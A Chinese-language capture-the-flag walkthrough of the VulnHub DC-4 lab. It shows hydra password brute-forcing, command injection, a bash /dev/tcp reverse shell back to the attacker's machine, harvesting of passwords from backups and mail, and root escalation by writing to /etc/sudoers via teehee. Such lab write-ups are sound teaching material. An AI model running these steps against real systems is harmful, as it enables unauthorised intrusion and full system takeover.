DC-4 靶机渗透测试实战教程

0X01 环境部署

1. 下载靶机

• 下载地址: https://www.vulnhub.com/entry/dc-4,313/
• 网络模式: NAT模式

2. 攻击机配置

• 使用Kali Linux
• 同样设置为NAT模式

0X02 信息收集

1. 主机发现

使用arp-scan工具扫描同一网段内的主机:

arp-scan -l

发现:

• Kali攻击机IP: 192.168.190.128
• 目标机IP: 192.168.190.132

2. 目录扫描

使用dirsearch进行目录扫描:

python3 dirsearch.py -u http://192.168.190.132/

3. 端口扫描

使用nmap进行端口扫描:

nmap -sS 192.168.190.132

发现开放80端口

0X03 初始访问

1. 爆破登录页面

发现admin可能是用户名，使用hydra进行爆破:

hydra -l admin -P rockyou.txt 192.168.190.132 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

成功爆破出凭证:

• 用户名: admin
• 密码: happy

2. 命令注入漏洞利用

登录后发现命令执行功能，通过抓包发现radio参数存在命令注入:

whoami

确认当前权限为web用户

3. 获取反向shell

在Kali上开启监听:

nc -lvnp 5678

利用命令注入执行反弹shell命令:

bash -i >& /dev/tcp/192.168.190.128/5678 0>&1

获取交互式shell:

python -c 'import pty;pty.spawn("/bin/bash")'

0X04 横向移动

1. 枚举系统用户

cd /home
ls -la

发现三个用户: charles, jim, sam

2. 查找敏感信息

在jim目录下发现test.sh和备份文件:

cd jim
ls -la
cat test.sh
cd /backups
ls
cat old-passwords.bak

将找到的密码保存到mm.txt文件中

3. SSH爆破

使用hydra爆破jim用户的SSH密码:

hydra -l jim -P mm.txt -I -t 64 ssh://192.168.190.132:22

成功爆破出密码: jibril04

4. SSH登录

ssh jim@192.168.190.132

0X05 权限提升

1. 查看当前权限

whoami
sudo -l

2. 查找敏感信息

检查邮件:

cat /var/mail/jim

发现charles写给jim的信，包含charles的密码:

• 用户名: charles
• 密码: ^xHhA&hvim0y

3. 切换到charles用户

su charles
cd /home/charles
ls -la
sudo -l

4. 利用teehee提权

发现可以使用teehee命令写入文件:

echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers

解释:

• | 管道符将前面输出作为后面输入
• teehee -a 追加内容到文件
• /etc/sudoers 存储sudo权限的文件

5. 获取root权限

sudo su
whoami
ls -la
cat flag.txt

0X06 总结

1. 信息收集阶段:

   • 确定目标IP和开放端口
   • 扫描网站目录结构
   • 识别Web应用功能

2. 初始访问:

   • 爆破Web登录凭证
   • 发现并利用命令注入漏洞
   • 获取反向shell

3. 横向移动:

   • 枚举系统用户和敏感文件
   • 通过备份文件获取密码字典
   • 爆破SSH服务获取用户权限

4. 权限提升:

   • 通过邮件获取高权限用户凭证
   • 利用sudo配置漏洞添加权限
   • 最终获取root权限和flag

关键点:

• 永远不要忽视备份文件和邮件等敏感信息
• 注意检查sudo权限配置
• 命令注入漏洞是Web渗透的常见突破口
• 密码重用是横向移动的常见途径